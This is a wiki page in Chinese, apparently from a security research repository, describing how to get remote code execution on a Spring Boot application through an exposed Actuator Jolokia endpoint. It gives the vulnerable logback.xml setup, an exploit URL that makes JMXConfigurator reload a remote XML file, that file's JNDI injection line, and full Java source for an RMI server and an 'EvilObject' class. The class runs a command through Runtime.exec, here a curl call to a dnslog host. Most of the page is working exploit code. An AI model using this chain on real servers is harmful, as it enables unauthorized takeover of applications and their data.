Actuators to RCE

说明

Actuators + jolokia

访问http://localhost:8080/jolokia，有response并不代表存在漏洞。

必须如下配置logback才能造成XXE和RCE：

文件名必须是logback.xml
配置了jmxConfigurator

比如下面的logback.xml配置：

<configuration>
    <appender name="STDOUT" class="ch.qos.logback.core.ConsoleAppender">
        <withJansi>true</withJansi>
        <encoder>
            <pattern>[%thread] %highlight(%-5level) %cyan(%logger{15}) - %msg %n</pattern>
        </encoder>
    </appender>
    <root level="info">
        <appender-ref ref="STDOUT" />
    </root>
    <jmxConfigurator/>
</configuration>

EXP

http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/127.0.0.1:8888!/xxx.xml

xxx.xml内容：

<configuration>
	<insertFromJNDI env-entry-name="rmi://127.0.0.1:1099/refObj" as="appName"/>
</configuration>

针对Java版本的JNDI注入，可执行Google，都有姿势可以绕过。

RMIServer.java

import com.sun.jndi.rmi.registry.ReferenceWrapper;

import javax.naming.Reference;
import java.rmi.registry.Registry;
import java.rmi.registry.LocateRegistry;

public class RMIService {
    public static void main(String args[]) throws Exception {
        Registry registry = LocateRegistry.createRegistry(1099);
        Reference refObj = new Reference("EvilObject", "EvilObject", "http://127.0.0.1:8888/");
        ReferenceWrapper refObjWrapper = new ReferenceWrapper(refObj);
        System.out.println("Binding 'refObjWrapper' to 'rmi://127.0.0.1:1099/refObj'");
        registry.bind("refObj", refObjWrapper);
    }
}

EvilObject.java

import java.lang.Runtime;
import java.lang.Process;

public class EvilObject {

    public EvilObject() {
        try{
            // 要执行的命令
            String commands = "curl http://rce.dnslog/joychou";
            Process pc = Runtime.getRuntime().exec(commands);
            pc.waitFor();
        } catch(Exception e){
            e.printStackTrace();
        }

    }

    public static void main(String[] argv) {
        EvilObject e = new EvilObject();
    }

}

Reference

Exploiting Spring Boot Actuators

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Actuators to RCE

说明

Actuators + jolokia

EXP

Reference

Clone this wiki locally